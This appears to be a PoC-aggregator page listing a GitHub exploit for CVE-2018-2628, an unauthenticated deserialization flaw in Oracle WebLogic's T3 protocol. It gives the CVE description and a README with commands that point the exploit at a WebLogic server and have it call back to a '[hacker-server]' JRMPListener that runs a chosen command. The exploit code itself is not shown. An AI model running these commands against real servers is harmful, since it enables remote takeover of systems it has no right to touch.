CVE-2018-2628 PoC — Oracle Fusion Middleware 代码问题漏洞

Source

https://github.com/cscadoge/weblogic-cve-2018-2628

Associated Vulnerability

Title:Oracle Fusion Middleware 代码问题漏洞 (CVE-2018-2628)
Description:Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Core Components). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

Description

weblogic-cve-2018-2628-exp

Readme

# weblogic-cve-2018-2628
weblogic-cve-2018-2628-exp


python2 weblogic-cve-2018-2628-exp.py [targetip targetport] ysoserial-0.1-cve-2018-2628-all.jar [bindip bindport] JRMPClient

python weblogic-cve-2018-2628-exp.py [weblogic-server] 7001 ysoserial-0.1-cve-2018-2628-all.jar [hacker-server] 2333 JRMPClient



java -cp [toolname] ysoserial.exploit.JRMPListener [bindport] [jdkversion] [command]

java -cp ysoserial-0.1-cve-2018-2628-all.jar  ysoserial.exploit.JRMPListener 2333 Jdk7u21 "calc.exe"

File Snapshot


 [4.0K]  /data/pocs/ba3e3b2bab8a0e65a3c42a2fc27ea53caaaa37f3
├── [ 500]  README.md
├── [8.2K]  weblogic-cve-2018-2628-exp.py
└── [7.0M]  ysoserial-0.1-cve-2018-2628-all.jar

0 directories, 3 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!